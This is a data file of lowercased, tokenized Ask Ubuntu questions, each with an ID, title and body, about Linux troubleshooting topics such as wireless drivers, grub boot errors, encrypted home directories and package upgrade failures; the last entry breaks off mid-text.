488535	broadcom 4311 wireless card on dell 9400 ( e1705 ) not working	i am following the advice of seasoned ubuntu professionals and am posting my question here with a printout of a script posted by wildman et al . i am grateful to you for your offer to help . here is the link to the script output : http : //pastebin.ubuntu.com/7706664/ i have tried numerous suggestions posted here on askubuntu.com . my device is not blacklisted . i can see it listed when i run lshw -c network : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : dfdfc000-dfdfffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:14:22 : f5:71:64 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=full ip=192.168.1.104 latency=64 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : df9fe000-df9fffff any advice you can offer at this point would be greatly appreciated . i believe i have tried just about every suggestion on the forum . i got the ethernet connection working , and i feel i am close on the wireless connection , also .
488536	wine wo n't start , lxtask shows absurdly large vm-size associated with it	i 'm running wine on lubuntu 14.04 and everything worked fine until today when i tried to start a windows program and it would n't run . after having the same result with several other programs i tried to open wine config , but the same thing happened . i 've tried to kill all the processes associated with wine and tried again , but the same thing happened . after restarting ( because maybe i did n't close all of them ) , same thing . when i 've looked more carefully under lxtask , it showed wm-size of 16777216,0 tb for anything related to wine . i 've tried reinstalling the wine , but it looks like i 've done something wrong because : the problem persists . somehow , now the wine config is lost from the menu . last time wine worked was when i was when i 've set it to behave like win98 .
488537	strange keyboard behavior after reboot	i 'm experiencing some strange keyboard behavior after rebooting my ubuntu 12.04 box . i have a microsoft ergonomic keyboard like this one . previously , i was able to use the extra keys ( e.g. , the `` favorites '' key ) to do things like launch a terminal . those keys are no longer registered by ubuntu at all . additionally , the keyboard lock leds ( num lock , caps lock ) do not light when i press the lock buttons , although they act correctly . that is , if i press caps lock , the caps lock led does not come on but letters show up as capitals .
488543	echos , variables , and help with this question	the book learning the bash shell says- '' notice that we used double quotes around variables ( and strings containing them ) in these echo examples . in chapter 1 , we said that some special characters inside double quotes are still interpreted , while none are interpreted inside single quotes . a special character that `` survives '' double quotes is the dollar signâmeaning that variables are evaluated . it 's possible to do without the double quotes in some cases ; for example , we could have written the above echo command this way : $ echo the value of \ $ varname is \ '' $ varname \ '' . but double quotes are more generally correct . here 's why . suppose we did this : $ fred='four spaces between these words . ' then if we entered the command # echo $ fred , the result would be : four spaces between these words . what happened to the extra spaces ? without the double quotes , the shell splits the string into words after substituting the variable 's value , as it normally does when it processes command lines . the double quotes circumvent this part of the process ( by making the shell think that the whole quoted string is a single word ) . therefore the command echo `` $ fred '' prints this : four spaces between these words . the distinction between single and double quotes becomes particularly important when we start dealing with variables that contain user or file input later on . '' my question is -- -- i have tried to practice with this , but i am confused . do i put- $ echo the value of \ $ varname is \ '' $ varname \ '' . $ fred='four spaces between these words . ' in a file ? like enter # nano , then put it in there ? or do i just enter it into the terminal ? neither are working . when i entered # nano fred and put it in that file and made it executable and changed `` varname '' to `` fred '' and ran ./fred , i got this as a result- the value of $ fred is `` '' help ! what am i doing wrong ?
488544	default directories on any ubuntu	i have been using windows for a long time . and now i have moved on to ubuntu ( 13.04 ) . i am just 2 to 3 weeks old for ubuntu . i do n't understand about the directories like /var , /home , /media etc . . . can somebody relate all the ubuntu directories to windows directories . that might be so easy for a beginner like me to understand . to be more precise , i do n't even know which directory behaves like c : and which one behaves like d : or e : or others . i do n't know where to save which kind of docs .
488545	grub rescue errorâś with ubuntu not installed	when i started up my computer today , i got the following message : error : no such device : dad66471-5aec-4a42-ae06-18d4d003626a . grub rescue > i searched for this error , and it seems to be ubuntu-related , so i figured i should post it here . the thing is , ubuntu has n't been installed on this computer in a long time . windows 8.1 is all i use . i have no idea why this would just happen all of a sudden like this . i have an ubuntu live cd and my windows 8.1 disc , if that helps . i 'm posting this from my nintendo 3ds . please help !
488557	deja-dup ( backup tool ) failing to backup	running ubuntu 14.04 , using deja-dup ( default duplicity-ubuntu ) as backup tool . it always worked till a couple of days ago . when backup starts to run now it reports an error : backup failed failed to read /home/marc/.cache/deja-dup/tmp/duplicity-t863_c-tempdir/mktemp-1mlxkq-1 : ( < type 'exceptions.ioerror ' > , ioerror ( 'crc check failed 0x967502e6 ! = 0x41060bb5l ' , ) , < traceback object at 0x7f5a6f9fc8c0 > ) the referred cache and tmp folders are empty ( also no hidden files ) . deleting the folder deja-dup under the cache results in a regeneration and the same error message ( folders are always empty ) .
488561	cant delete folders	i 'm trying to delete folders in ubuntu 14.04 but the delete option is n't available.the folders can be deleted using the terminal or the delete button but there is no delete option wen right clicked what should i do in this situation ?
488562	when i open zip files they turn into 7z and then wo n't open	i 'm using xubuntu 14.04 and when i try to open a .zip file with the default archive manager it turns into a .zip.7z and then it does n't open .
488568	any way to enable dynamic/automatic brightness adjustment ?	my lenovo thinkpad x201 tablet has a very bright screen ( 400 nits ! ) , which is good for when objects on the screen are dark ( say a night scene in a movie ) , but it is of course very blinding when objects are bright/white . i find myself continuously changing the brightness when watching a movie/video like this , and it is quite annoying . is there any utility available that will automatically change display brightness depending on if objects on screen are bright or dark ? i know this is an option built into some desktop monitors ( in the form of dynamic contrast i believe ) , but i have not found the same kind of thing for laptops . to clarify , i would like a utility ( or simple script , even ) that turns the brightness ( as in the backlight ) up when the majority of stuff on screen is dark/black , and dims the brightness down when the majority of stuff on screen is bright/white , to take full advantage of this bright screen . any help would be greatly appreciated !
488569	can only transfer photos from moto x to ubuntu 14.04	i have a moto x and use ubuntu 14.04 , as far as i know 14.04 has mtp support in addition to the mtp-tools i installed but for some reason i can only transfer photos from my phone to my pc . when i try to open a .pdf it displays an error of could not open ( using okular ) , when i try to copy the .pdf to my desktop it shows error getting file : -6 : not supported , when i try to open a .mp3 it does n't play and when i try to copy it to my desktop i get error getting file : -1 : unspecified error and freezes my desktop . in addition to that , if i try to open an .mp3 file and then a photo i get failed to open input stream for file . any clue as to how to solve this ? i just need to get my .pdf , i do n't care much about the music . ( i 've tried setting up an ftpserver but still got the same errors ) edit : forgot to mention i can transfer files and open them right away but if i unplug my phone and reconnect they 're no longer accessible .
488571	how to install google gadgets on ubuntu 14.04 ?	i 've been looking for a way to make my desktop more interactive and i found two packages : google-gadgets-gtk screenlets after reading a bit about both i decided to give google gadgets a go . however , to my surprise , they 're not in ubuntu software center anymore . it seems the blog post i read was written around ubuntu 10.. i 've googled for it , and did not find any tutorial metioning how to install google gadgets on ubuntu 14.04 trusty tahr . is there a reason they are no longer in software center ? are they no longer maintained or something like that ? is there a way to get them up and running on ubuntu 14.04 ?
488572	plymouth help with ubuntu	i installed ubuntu 14.10 with kernel 3.16 rc2 . i also installed a theme called `` moka '' . when i open my pc i see : '' parser error : error opening file /lib/plymouth/themes/moka-logo/moka-logo.script '' when i login using kernel 3.13 it is all ok/
488575	juju - configuring a service by clicking on charm with stand-alone implementation - lxca	i brought up a local/stand-alone juju environment that creates lxcs for each service deployed . what i notices is that i ca n't be redirected to the service configuration screen when clicking on the `` charm '' ( iam using a mac , os x , fusion ) within the `` juju-gui '' . this is the case with wordpress , mysql , as well as a charm that i created . relationships , as it appears on juju-gui and defined via command line or juju-jui , appear to be only a `` green line on the screen '' . the charms that i loaded via local repository came up ok , and did not show green on juju-gui until completely up , but relationships ( green line ) do not appear to have any meaning other than graphical picture - no status . is this because i am in a stand-alone ( local ) dev environment ? i am running 14.04 . thanks ... .
488581	blutooth adapter missing after latest upgrade	i just installed the latest updates to ubuntu 12.04 lts and after the required update blutooth was not working . searchine for bluetooth in dash reports that there are no bluetooth adapters installed on my computer . where can i find the adapters to download and reinstall bluetooth to get my mouse working again ?
488584	why ca n't i start eclipse after i killed it once ?	eclipse ide in my computer running ubuntu 13.10 hung once . i just killed the process . thereafter it shows this whenever i try to start eclipse : job found still running after platform shutdown . jobs should be canceled by the plugin that scheduled them during shutdown : org.eclipse.core.internal.events.notificationmanager $ notifyjob the eclipse splash occurs , but as soon as the progress bar fills up , no eclipse window appears . the problem persists even after restart of computer . eclipse version : 4.3 with android plugin installed java version : jdk 1.8.0
488585	old digital camera control - take pictures	what i would like to do i was trying to take pictures with an old digital camera directly from pc i found about gphoto2 software , i tried but i 'm just able to get the pictures that are stored in the camera ( my old fujifilm a900 digital camera , and new canon eos 600d ) i can not take pictures directly from pc then i realized that could be better if there is any way to control any digital camera creating your own drivers . to manage actions like opening the objective , take a picture , set camera to standby ... i 've been reading other questions related with this but could n't find any interesting information . i know about python and bash script , but i know nothing about drivers so ... could be possible to develop some kind of software/drivers to manage an old digital camera ? i want to connect my old digital camera to my raspberry pi and try to make a timelapse movie edit some extra info i would appreciate : although it is a lot of work , if i 'd like to create my own drivers , where can i start for ? if i 'd like to develop my own firwmare ? it 's possible to change/update the internal software/firmware of an old digital camera ? i 'm not looking a full answer to this `` extra '' question , i just want some information to read about this options , if they 're possible
488588	how do i connect to multiple wifi networks ?	how can i connect to 2 wifi networks at the same time with only 1 wifi-adapter ? i have two separate wireless networks , to which i need to connect the ubuntu-pc simultaneously : the first with internet access and the other one without internet access . i tried to create a virtual interface and even though there does n't seem to be an error , it did not appear in the network manager . it would seem , the driver i am using , is ath9k : how can i find out whether my it can create virtual wireless interfaces ? can i replace the driver ath9k , if it does n't support virtual interfaces ?
488591	quick question : will a fresh install ubuntu detect my raid-0 ?	i have ubuntu installed on an external drive and windows installed on my primary `` c : '' drive . i 've been dual-booting this way for years . recently , i upgraded my single ssd c : drive ( where windows resides ) by adding a second ssd in raid-0 . now , my existing install of ubuntu no longer detects my c : drive . does ubuntu not natively detect raid drives or do i simply need to reinstall ubuntu ? must ubuntu also be on the raid to detect it ?
488592	how do i enable 60hz on my 4k monitor ?	i have the very new asus pb287q 4k monitor and i 've enabled display port 1.2 in its osd menu system , but my ubuntu 14.04 laptop still is n't using 3840x2160 at 60hz - it 's stuck at 30hz . i 'm curious what 's the correct way to get this to 60hz ? i have an ati mobility firegl m8900 and i 'm using fglrx . 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] blackcomb [ radeon hd 6970m/6990m ] fglrx : installed : 2:13.350.1-0ubuntu2 candidate : 2:13.350.1-0ubuntu2 version table : *** 2:13.350.1-0ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ trusty/restricted amd64 packages 100 /var/lib/dpkg/status here is the relevant xrandr output : dfp5 connected 3840x2160+1920+0 ( normal left inverted right x axis y axis ) 621mm x 341mm 3840x2160 30.0*+ 2048x1536 30.0
488597	login screen getting hanged after it wake up from suspend , unable to enter password	also the background of login screen ( after suspend wake-up ) is different from screen i get after restart/shutdown . every i need to restart the system after suspend . please help me to solve this . i just need a simple login screen each time either i restart or suspend and it should work .
488598	only ubuntu available after windows 8.1 and easybcd	i recently installed windows 8.1 on a partition of my hard drive , after installing easy bcd , i enabled a neosmart linux boot option , this did not work , however it did mean that i could select windows 8 , or i could press escape when the windows boot manager came up . after accidentally changing the neosmart linux to default , i no longer have an option to use windows , please help !
488599	which kernel to choose during install	when installing 14.04 from the mini iso , i have to select which kernel to use . i have simply been choosing linux-generic-lts-trusty without giving it much thought . should i choose one over another ? also , while we are talking kernels , is there an intel atom netbook optimised one available for ubuntu , and if so should i really be using that ? edit : i have added the kernel selection page screenshot .
488601	grub ca n't find normal.mod but its apparently in the directory its looking , help	i tried installing ubuntu onto an external hard drive but upon boot-up i get an error . the error complains about an invalid external . i tried re-installing my system in case i did something wrong during my original installation . after re-installation it displays an error message that it can not find the normal.mod file . i have tried using a live-boot disk and to copy the missing normal.mod file but the normal.mod file is in the correct directory , the system just ca n't seem to find it . i tried finding an solution but i am a novice with computers and not really acquainted with using the terminal . a step by step solution to fix the missing normal.mod error would be appreciated .
488609	alt-f2 stops working and other issues when using a mac keyboard on 12.04	trying to switch to an apple keyboard on ubuntu 12.04 brings up a number of issues . there 's lots of old information out there on google , i 'm going to post this as the current solution . 1 ) on a regular keyboard , you 're used to having alt next to the spacebar , and the silly windows , `` command â '' , or `` super '' key sits unused between ctrl and alt . but apple puts their â key right next to the spacebar making the alt key you use all the time harder to thumb . trying to fix that with xmodmap and .xinitrc has no effect outside of terminal applications . 2 ) alt-f2 to run commands does n't work anymore ? that was actually broken until 12.02 , but should be fixed now . that stumps you until you realize : 3 ) that the f* keys across the top by default now do nifty/useless things like changing the volume of the music . there 's a `` fn '' key where the useless `` insert '' key used to be that you have to hold to get them to do their normal behavior . 4 ) the naive approach of using settings / keyboard / shortcuts / system has the `` show the run command prompt '' disabled and italicized , and you are unable to enable it 5 ) some instructions on the web tell you to use ccsm , the `` compizconfigsettingsmanager '' under `` gnome compatibility '' and enable the `` run dialog '' but it stubbornly stays disabled : 6 ) the `` printscr '' key at f13 does n't do anything , with or without the `` fn '' key .
488612	how do i install the lsi megacli in ubuntu ?	similar to this question ( http : //serverfault.com/questions/192394/megacli-always-returns-blank-output ) with some differences . i am using perc h710p raid controller on dell ubuntu box . i download 1.01.39_linux_cli.zip ( according to https : //calomel.org/megacli_lsi_commands.html ) and save megacli64 on ubuntu usb boot drive . then i boot the machine into usb , and run megacli64 . but the output is always blank . thank you very much for the help .
488614	user folder disappear , ca n't login as root and only guest user works	the problem is that my user folder is missing my home/ directory is empty , i ca n't log in as the admin account , stuck in lightdm loop but only the guest user works but with no access to root ... . even with the live cd ca n't see my user directory the only thing that indicate that all my folders still exist that the size of that partition is the same.. allways having the same used space that after the problem accure . what can i do ? thnx
488615	is it safe removing oneconf ?	i use xubuntu , but in this moment i have only 1 gb ram and the system is very slow , so i started to remove services and tasks that i do n't need . i found that 'oneconf ' use 14 mb ram , that is too much for me . can i remove safely ? i found that wiki page , but i ca n't answer the question .
488622	easy alternation between different java version installation	i currently have java 6 installed on my system ( please do n't laugh ) and we are moving to java 8 . so we have changed the main branch of our application to use java 8 , however , we need to support old versions that run on java 6 . so we need to easily alternate . i understand that java ( command ) points to /usr/bin/java , which is a symlink to /etc/alternatives/java and that that directory has a bunch of other java-related commands pointing to the actual hard directory where those binaries live ( /usr/lib/jvm/java-6-sun/jre ) . i can install java 8 without uninstalling java 6 and would like to have a mechanism of easily repointing the related commands in /etc/alternatives from /usr/lib/jvm/java-6-sun/jre to /usr/lib/jvm/java-8-sun/jre . is there a quick and existing way of doing it as opposed to writing my own script when i have to go to legacy branches/versions of our app for troubleshooting and prod support ? like flip the java alternative from 6 to 8 and it does it all for you . our version of ubuntu is 10.04 ( again , please do n't laugh ) .
488624	turn off scroll wheel application switching in cairo dock	does anyone know of a way to disable application switching when the scroll wheel gets bumped while the mouse is hovering over the cairo dock ? i do n't see any options for this in the settings , but it 's a fairly annoying `` feature '' that i 'm hoping someone else has found a way to turn off .
488629	why my usb mouse stays on after shutdown ?	in my desktop i have 8 usb ports , only the one the mouse is connected remains on after i shutdown the computer . i tried to plug the mouse on another usb port and this time this one remains on after i shutdown the computer , all the others are off . if i chose hibernate instead of shutdown , all the usb ports are off . the same problem happens with different distros like : xubuntu , ubuntu , mint , manjaro . is this a bug ? can this cause problems to my comoputer ?
488633	cant install virtualbox	i cant install virtual box on ubuntu 14.04tls and i get an error . i have been googleing every possible fix but i just cant figure it out . i need someone to please help me . cd/dvd 'ubuntu 14.04 lts_rusty tahr_-release amd64 920140417 ) ' is required and i dont even have a cd rom .
488634	windows xp ubuntu 14.04 dual boot problem	i recently installed ubuntu 14.04 lts on my desktop that had been running windows xp ( sp3 ) exclusively . in addition to the main xp partition , there was a smaller xp recovery drive . my goal was to install ubuntu in a dual boot scenario however , i 've never been able to boot to the main windows partition through the grub loader . when the option is selected , all that results is a black screen , flashing cursor and no further activity . i used the installation disk to create the ubuntu partition which , of course , resized and created a new windows partition . i thought i was careful to allocate more than enough space to the windows partition and i also made sure to defragment the windows drive just prior to installing ubuntu . i also backed up most of my important files unfortunately , i did have some encrypted files on the drive that i failed to back up . ubuntu loads just fine and i am able to access my windows drives through ubuntu but , as mentioned , the xp operating system wo n't boot even though grub displays the option . it should be noted that - for a while - i was able to boot to the windows recovery partition . unfortunately it now appears that partition has since been `` corrupted '' while attempting various repair attempts i.e . it partially boots but no longer proceeds to an option list . here are some things i 've tried : -ran windows xp repair disk . attempted `` fixboot '' and `` fixmbr '' commands . result : `` ... ca n't find the system drive or the drive specified is n't valid . '' - '' chkdsk '' command did generate error message however , other disk diagnostics report that disk is fine . again , ubuntu is running well . -replaced ntdetect.com and ntldr files in the xp partition with copies from the xp installation disks . -removed ubuntu using o/s uninstaller from the boot repair disk with intent to reinstall after recovering windows . -unsuccessfully attempted to load xp using the recovery console . -freshly installed ubuntu 14.04 lts . partitions still visible but main xp o/s still fails to load . i 've also run the boot repair program a couple of times . here is the result of the most recent : http : //paste.ubuntu.com/7702534/ i do not have the expertise to evaluate the data generated however i noticed a few error messages and also a notation regarding ntldr being `` missing and/or compressed . '' i understand the ntldr file is utilized by xp in the boot process . the process resulted in a `` successful repair '' message even though i still can not load the xp o/s . i would appreciate any suggestions about how i might repair and then boot to my xp partition . thank you !
488636	how to get back to normal after ecryptfs-rewrap-passphrase screw-up ?	after my laptop lost power last night , i logged on today to find my encrypted home directory not mounted . since i have recently changed my login password , i used ecryptfs-rewrap-passphrase /home/.ecryptfs/ $ user/.ecryptfs/wrapped-passphrase to rewrap my passphrase , using my old login/ecrypt passphrase , and entering my new login/ecrypt passphrase . this had worked in the past . i logged out , and logged back in , and , no good home directory . i had forgotten about ecryptfs-mount-private , so i tried it again , but this time the screen went black and it just sat there for a while . i stupidly then just turned the laptop off . then restarted , logged in , and this time tried ecryptfs-mount-private . i get : enter your login passphrase : error : unwrapping passphrase and inserting into the user session keyring failed [ -5 ] info : check the system log for more information from libecryptfs error : your passphrase is incorrect ... though i know i 'm entering the correct passphrase . when i did sudo ecryptfs-recover-private it did indeed find it : inserted auth tok with sig [ xxxxxx ] into the user session keyring info : success ! private data mounted read-only at [ /tmp/ecryptfs.vzcfawzw ] . ok , so what do i do next ? should i go into full recovery mode and copy the found directory to another disk , and start from scratch ? or should i try : ecryptfs-wrap-passphrase /home/.ecryptfs/ $ user/.ecryptfs/wrapped-passphrase ... hoping that i can give it the original mount password , and then my login password again . or ? ? ? i 'm a in a bit of a panic , and am worried i 'm going to screw things up more . any help would be most appreciated ! the man pages are very terse and unclear .
488638	battery status not refreshing	it was working fine , but after upgrading unity to last version , it is not refreshing anymore . the percentage and charging status remains on what it was on system startup . acpi command in terminal , and even 'power statistics ' shows the right info . battery indicator on the top bar and 'power settings ' page are not refreshing . even when battery percentage hits critical level , nothing happens till the system shutdowns . laptop : lenovo g580 ; ubuntu version : 14.04 lts ; kernel : 3.13.0-30-generic .
488639	new ubuntu 14.04 on thinkpad e145 bluetooth not working	i just installed ubuntu 14.04 on a brand new thinkpad e145 and am trying to use a bluetooth wireless mouse . i can not pair it because ubuntu can not discover it . i have tried most of the solutions that i found on google but have had no success . can anyone help ? thanks
488642	ubuntu 12.04 not loading after gnome uninstallation	i 'd installed and than uninstalled gnome desktop environment . now , my ubuntu 12.04 is not loading at all , it just does n't go pass the ubuntu waiting screen after boot load . however , i am able boot in recovery mode as root ( drop to root shell prompt ) . i 'm still newbie into linux , please help ...
488645	how do i use another partition as home post-installation ?	i have a home partition from a previous installation that i grew out of ( zorin os , really slow boot time ) and now i have a kubuntu install that i just recently created . my question is : how do i both transfer the packages from the previous installation ( all applications ) and use the users from the old home for the new installation ? in the past , simply mounting the partition as home has not created the new users , it has simply created a new user during install , and when i 've tried creating a second user , deleting the home folder of that user and putting a shortcut to the other folder renamed to the same name , it has not gotten past the logon screen for that user . is there something that i 'm missing here ?
488649	clamav finding threat in steam file	so i just installed ubuntu 14.04 , since it 's summer vacation and i need something to play with : d i have installed steam , no problem . but when i went to install clamav with clamtk just for good measure , i got a threat from a file in the steam directory when i scanned . i am using the gui for clamav , and the file is located /home/ ( myuser ) /.local/share/steam/resource/sourceinit.dat the status is pua.win32.packer.privateexeprote-7 and it says action taken none . when i first got the threat i just said to delete/quarantine it , but when i restarted steam and scanned again it had reappeared . so im wondering if it a false positive or something ? also , when i try to update clamav it the says the following : sudo freshclam clamav update process started at fri jun 27 00:10:51 2014 warning : your clamav installation is outdated ! warning : local version : 0.98.1 recommended version : 0.98.4 do n't panic ! read http : //www.clamav.net/support/faq main.cvd is up to date ( version : 55 , sigs : 2424225 , f-level : 60 , builder : neo ) daily.cvd is up to date ( version : 19132 , sigs : 1054516 , f-level : 63 , builder : neo ) bytecode.cld is up to date ( version : 242 , sigs : 46 , f-level : 63 , builder : dgoddard ) is this nothing to worry about or something that shouldnât be handled ?
488650	how do i start a tmux window on startup and execute a scrips	i would like to be able to start my server and have a detached tmux window with a script running . so then i can attach with ssh and be able to work with the script . thanks , anthony
488651	dpkg-repack errors autoresolve ?	i want to move to another installation , and i 'm trying to use the dpkg-repack command to do it , but every time it comes across an application that is not perfectly installed , it quits . it will take forever to resolve it at this rate , as it is easily resolved by running sudo apt-get install but i have to do it for each one , and then i have to start dpkg-repack from the beginning . i have a lot of packages , and not enough time to manually reconfigure every incomplete application installation along with wait for it to come to the next error and restart again . how do i either resolve all the errors at once or make it ignore the applications for which it experiences errors on ?
488655	wifi wo n't stay connected ubuntu 14.04	wifi wo n't stay connected ubuntu 14.04 i have to reboot to get a connection . problem begain after upgrade .
488662	usb controller adapter converter for snes controller not working	trying to get a snes controller working through a usb controller adapter converter . after lurking through the internet , i 've found plenty about the various software solutions like qjoypad and jstest-gtk . of course , i 've provided the lsusb : bus 002 device 006 : id 06a3:8020 saitek plc eclipse keyboard bus 002 device 005 : id 1532:0016 razer usa , ltd deathadder mouse bus 002 device 009 : id 046d:0807 logitech , inc. webcam b500 bus 002 device 010 : id 0925:8866 lakeview research wisegroup ltd , mp-8866 dual joypad bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub when i try to use the controller , qjoypad does n't even recognize it , and jstest does n't seem to recognize it consistently when i press buttons . any ideas ?
488665	maas connection refused 8000	from the new node i am trying to add - i get the following error could not connect to < > :8000 ( < > ) . - connect ( 111 : connection refused ) . any suggestions are appreciated ?
488667	i want ubutu but i have a question first	i 'm not new to ubuntu my friends use it i never had a chance to use it on my own pc i 'm running on a window 8 and it has no info like product keys and such it was on the box and this is a hand me down pc my question is do i need those for the installation if so how do i retrieve this info
488668	ubuntu 14.04 google chrome broken	i 'm running ubuntu 14.04 and chrome seems to have broken with no way out . i was fiddling with the command line flags , and i activated something that i did not want . i disabled it and restarted the browser , but then the following behavior commenced : i would click on the `` google chrome '' icon in the unity launcher , but even though it was there , another chrome icon would pop up at the bottom of the launcher ( the behavior of non-pinned running programs icons ) . not only that , but the second icon would not have the proper right click menu , and also it 's `` name '' ( when hovering over the icon ) is the tab that i had opened when things broke in the first place ! here 's a screenshot illustrating this behavior : look at the menu bar title and the icon title on the launcher , and note that there is already a chrome icon pinned . how do i fix it ? this is something that really bugs me and would even merit a reinstall . i have already tried apt-get purgeing it , as well as deleting the ~/.config/google-chrome folders . nothing changed it . thanks
488671	libc6 : depends : libc-bin ( = 2.15-0ubuntu10 ) but 2.15-0ubuntu10.5 is installed	problem so i having this problem after upgrading from ubuntu server 8.04- > 10.04- > 12.04 . initial command apt-get install -f dpkg : warning : files list file for package `tcpd ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `python-pkg-resources ' missing , assuming package has no files currently installed . ... . many many more of these warnings dpkg : warning : files list file for package `libxml-libxml-perl ' missing , assuming no files currently installed . ( reading database ... 1126 files and directories currently installed . ) preparing to replace libc6 2.15-0ubuntu10 ( using ... /libc6_2.15-0ubuntu10.5_i386.deb ) ... a copy of the c library was found in an unexpected directory : '/lib/i386-linux-gnu/libc-2.15.so' it is not safe to upgrade the c library in this situation ; please remove that copy of the c library or get it out of '/lib/i386-linux-gnu ' and try again . dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10.5_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/libc6_2.15-0ubuntu10.5_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) things i have tried i have tried moving the libc-2.15.so but this creates an error : apt-get : error while loading shared libraries : libc.so.6 : can not open shared object file : no such file or directory apt-get -- purge remove libc6 this will not work as libc6 is needed by the system sudo apt-get install -- reinstall libc6=2.15-0ubuntu10.5 libc6-dev=2.15-0ubuntu10.5 just guess work but this did n't work either . anyway , as you can see i 'm stuck , i can not upgrade any of my packages ... my sources list is take from here https : //help.ubuntu.com/12.04/sample/sources.list
488672	iperf stress testing on single machine	i want to do a stress test using iperf in lubuntu using a single machine . i 've tried doing the dummy ip route , i 've tried changing the ip route table , yet still it goes through the local host and does n't stress the switch . any suggestions ? the first thing i tried was a virtual machine , but as one might have guessed it still goes through the local host . is there any where i can modify the arp settings so that the local host does n't see a nic as local ? i 'm using a wifi and ethernet , but i can do another ethernet port with a usb adapter . my final idea was maybe find a way for the virtual machine to use a wifi card that the physical machine does n't recognize but i do n't have any wifi cards that require fancy drivers , and i 'm not even sure if that would work .
488673	windows 8 not available in grub	i tried to install ubuntu next to windows 8 ( because i really do n't like windows 8 ) but ubuntu lacks some of the things i need that i had on windows 8 for a class i am taking right now . ubuntu is working , but the grub menu that comes up only shows ubuntu as an option . also , when i change my boot mode from legacy back to uefi my computer either says operation system not found or windows encountered a problem and needs to restart . i ca n't reinstall windows because i do n't have my product key . are there any other solutions ?
488674	wireless full or half duplex ?	i have a wireless card ( lshw output below ) . i am copying video files from a nas device to my ubuntu , and i am getting about 4.3 mb per second . this is about half of what i get when i copy files from the nas to a windows box which is wired with ethernet . my wireless router is enabled for 5g , and i am connected to that ssid . do wireless routers even have the concept of 1/2 duplex ? i remember when i was setting up windows servers , we 'd always have to check those settings . are there any other things i can check to see what could be limiting my speed ? *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 34 serial : 60:67:20:0b:4b:54 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-29-generic firmware=18.168.6.1 ip=192.168.1.7 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:46 memory : f7d00000-f7d01fff
488677	msmtp with msmtpq ( queued delivery )	what i intend to do use is the function called msmtpq to have messages that are sent while the computer is offline , queued for delivery when the machine comes back online . i have followed the guide here guide and have n't gotten anywhere . if there is anyone that has experience with this task , using msmtp , sendmail , and the example scripts included in msmtp package , please lend me some guidance . os is ubuntu 12.04 lts
488678	where is my ubuntu os files located ?	i 'm running windows 8.1 box . i chose to install ubuntu 14.04 `` along side of windows . '' what i want to know is where are the ubuntu files stored ? see the image below . thank you for your time . jameskb
488679	how to install deb package onto usb rescue drive ?	after making a usb boot drive , how to add extra deb packages to it ? thanks . ==extra info== i create usb boot drive by following the instructions from systemrescuecd . on a normal system , the extra package is installed using `` dpkg -i '' . but when boot using usb ( choosing option 6 from the menu ) , i can not run this command .
488680	squid forbidden erro	i am having the problem outlined in https : //bugs.launchpad.net/maas/+bug/1297008 ? comments=all i am running my own isc dhcp server on 10.0.0.1 and restored original squid3 settings , which is allowed-networks-src.conf # network sources that you want to allow access to the cache private networks 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 127.0.0.1 ipv6 private addresses fe80 : :/64 : :1/128 additional non-private networks can be added to the directory : /etc/squid-deb-proxy/allowed-networks-src.acl.d any suggestions on how to resolve the bug are appreciated !
488682	which release do i use	i am trying to install unbuntu for the first time and have been unsuccessful . i am using unetbootin . first i used the 14.04_live distribution and was told i had a corrupt kernel . i then used 14.04_hdmedia . it trys to boot up , scrolls rapidly through several pages of notifications about what it is doing and such . it then hangs on a dark blank screen . i welcome advice , but my first thought is , maybe i 'm using the wrong distribution for my laptop . which distribution should i use for the following pc hp pavillion dv-5000 32 bit xp windows media center . thanks .
488686	unable to login into ubuntu 12.04 lts , bounces back to login screen	i do understand this is a common problem . i have read and tried most of the suggestions but have not found a good solutions . thus i am posting my question . enter the correct password , the computer loops back to login screen enter an incorrect password ubuntu responds incorrect passwords pressed ctrl + alt + f1 the console can be accessed , but does't recognize common commands such as ls , cp , cat , more etc the following command was added /etc/profile file before the occurrence of the current scenario : path= '' ... : /opt/qt/lib '' ( this was an error ) echo command works do an echo $ path the response is `` ... : /opt/qt/lib '' currently /etc/profile looks something like the following # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi path= '' ... : /opt/qt/lib '' # this line is in error so if /etc/profile file can be edited to remove the last line the problem might be solved . any suggestions how this can be achieved . thank you in advance following are some of the threads that have been referanced ubuntu 12.04 can not login ca n't log in - cycles through 